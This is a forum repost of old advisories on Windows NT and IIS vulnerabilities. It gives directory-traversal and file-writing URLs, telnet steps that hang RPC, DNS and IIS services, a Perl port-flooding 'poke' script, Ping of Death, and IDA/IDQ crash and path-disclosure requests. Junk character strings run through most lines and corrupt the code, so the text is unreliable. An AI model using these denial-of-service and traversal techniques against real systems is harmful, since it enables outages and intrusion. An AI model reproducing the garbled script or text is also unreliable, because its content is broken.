天天爱天天做天天做天天吃中文|久久综合给久合久久综合|亚洲视频一区二区三区|亚洲国产综合精品2022

    • 

    <delect id="ixd07"></delect>
      

      

      汶上信息港
      
標題: NT的漏洞及描述(英文) [打印本頁]
      

      
作者: 雜七雜八    時間: 2011-1-13 17:12
      
標題: NT的漏洞及描述(英文)
      受影響系統(tǒng):4.0,iis 1.0+ r1 K/ Q$ c. r3 e; M
      
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.) ^8 W1 S6 T/ y+ N$ n
      

      
( }8 {7 {% t) [! \# J4 ]A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
      
5 R! V+ \5 N! x# T+ [6 y$ K7 a3 G! [7 B( Y
      
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
      
$ u2 G! k$ J% \4 q
      
6 x6 f: G& r+ t9 n' B+ k, ^--------------------------------------------------------------------
      
( c- f/ M8 h3 j, S% ?0 H' h7 |( P# K  n" B& v
      
受影響系統(tǒng):4.0
      
% I+ T; J( l# o( @- qA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.  b; a, H9 V! V1 J
      
) a, D; S4 {& g1 Z7 D8 P
      
If the file 'target.bat' exists, the file will be truncated.
      
; l( H7 ~4 Q$ C# p! \
      
& `, ^0 j/ b* L" {6 W' J- {* L0 Y7 g4 ^+ ~% G  h0 R1 y6 J
      
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
      
' G- l6 E8 q0 w, z! o9 |
      
5 b$ H. b8 B1 v+ N----------------------------------------------------------------------
      
; L7 O" I% E( s7 J0 ]# o# E! x: l4 o$ D/ N
      
受影響系統(tǒng):3.51,4.0
      
4 j4 C: p* z' u# |/ C; KMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.1 p. P& F2 K7 i9 g5 K2 d
      

      
9 b# s; t1 |- c4 z5 h: J/ k" fThe following steps;
      
* E  t& j& c3 ?$ R1 i& s$ z: B; ]8 `& x4 W! {
      
Telnet to an NT 4.0 system on port 135 6 u3 P6 Y# t6 {5 c& i$ {1 ?
      
Type about 10 characters followed by a <CR> 
      
1 o" \( L6 i  c  l  eExit Telnet 
      
) o0 x( T6 Q& U" H9 yresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
      
6 K& M' C: u3 }. \% }9 G& t' A
      
% }' s6 G, E6 c: L, `1 g3 HWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.% [- F% V  d1 w( _) c4 h& r
      

      
* J" Q7 L3 a8 o# ]8 p& QThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.( @# g9 e' D: Q0 Q
      

      
* D1 Z! x! W/ P5 U3 z2 P$ OIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.. w8 m# V6 G8 C8 f
      
& C2 x7 F! ~' y
      
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
      
  y( p" L) p4 h3 M) L7 P
      
, q9 j: J- C; A; f# t! Q) U/*begin poke code*/4 e) `6 o. [" P  n0 z# t9 C0 m
      
5 \7 b4 H" b% p2 j9 ?
      
use Socket;; v! C' [" O; x
      
use FileHandle;
      
1 y. Y! z3 v3 G. y" N3 h6 A# Yrequire "chat2.pl";" J/ _; Z4 p6 I, J/ X9 y& ^) l1 o9 N: s
      
1 k, f) k8 j* ]  b( j7 F2 }  c
      
$systemname = $ARGV[0] && shift;- l4 j. H6 z$ ~) i
      

      
( w+ x4 F7 c- D0 P& ]$verbose = 1; # tell me what you're hitting. b( l8 F- E% B2 p, X2 s
      
$knownports = 1; # don't hit known problem ports9 G! O8 O& Q8 s( E
      
for ($port = $0; $port<65535; $port++) 
      
& n0 r* Z/ r& y2 S$ f+ ]' J{
      
- G# C' H3 H/ y' M+ ~, O4 w2 ?) T: A; t
      

      
* D* Y+ |" {# p+ Y7 ^* vif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {1 C: h1 e8 E& _  H' X# M
      
next;
      
1 ^! R! e! f8 w3 i; q+ ?; l}1 y7 h, I0 f: z  N! u1 V* u$ s
      
$fh = chat::open_port($systemname, $port);
      
/ I' ^" B6 E. J' f* z0 f2 [# {$ Qchat::print ($fh,"This is about ten characters or more");
      
; m% q! c: W" ~. Z$ m- aif ($verbose) {3 z0 P9 s8 v$ G, a% f/ ]
      
print "Trying port: $port\n";
      
; }/ L4 l( ^% F8 C} 
      
( @7 ]$ ]  _! Q. t, P. Q& a& zchat::close($fh);
      
' ^6 b3 e) v& F! q. V5 m  j* ~
      
3 W% T) N/ Q4 X}
      
% j2 O5 H+ h' s4 o$ M' `  i; L4 r5 {( l% f' V# @
      

      
0 l  v% @% m8 R6 W/*end poke code*/2 N& h$ |8 W# e3 G
      

      
" \6 M3 B$ r! Y% [3 fSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
      
5 \" ^3 g) X% V8 U$ t
      
0 d* y$ o/ X9 R8 Z$ l--------------------------------------------------------------------------------
      
$ n" a/ d$ B* I7 x* U" \$ n6 C4 X* [! C- Y9 k
      
受影響系統(tǒng):4.0; E  v) h2 }; {$ o$ }$ E7 T
      
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.( j" i. o- z5 o$ k$ u- b
      
2 C1 G8 \1 }3 c, U. t. i( R
      
This attack causes Dr. Watson to display an alert window and to log an error: 
      
! N2 x5 e3 f9 y. [' y' c2 G4 J% M
      
9 I3 T$ Y1 E  [- ?6 @( G"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"4 \7 b& Q, I( `/ T
      

      
6 l1 e0 t0 H( W( |( R( S--------------------------------------------------------------------------------
      
( D6 p' Y+ Q; B+ K& z2 a& t0 S8 h7 T" ^
      
% R/ w# f7 `+ Q2 \. \: N受影響系統(tǒng):3.51,4.0( p0 N1 ]! ?1 X
      
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
      
% ^! N3 Z2 v9 }" D+ T7 a- B* }9 ^( ~& g0 X$ h; G
      
STOP: 0X0000001E
      
3 A6 k) t. {  H# N, F! x6 O% sKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
      
4 e0 a) A' i; d0 \& K2 _! Y- {- c: d7 }9 z
      
-OR-
      
+ Q, i% i* ^1 U
      
" P( x# i4 u$ M, }STOP: 0x0000000A+ G- o7 D) r4 y( {) d' Y5 B3 B2 q! x5 ]
      
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS3 C4 ~( o5 o' [4 L8 M
      

      
1 E5 d# n( v* x: ^1 ENT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
      
& U6 O, i& w& f  x- t/ p4 R7 W6 r- @: m7 R* h
      
--------------------------------------------------------------------------------
      
8 r: _' P( L0 O; G, {2 _. G* E) d$ j7 p0 m0 s' @: L1 ~. i! b; w: e
      
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). / ^2 c5 M! j6 B; }9 m1 ]) C- \. |
      
. U1 o' e0 Y( @& w0 D# k5 d* n  b
      
--------------------------------------------------------
      
- E) r/ W. ^+ E- `: J" F3 C  o& k! z
      
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server




      

      

      歡迎光臨 汶上信息港 (http://www.vancelump.com/)

Powered by Discuz! X3.5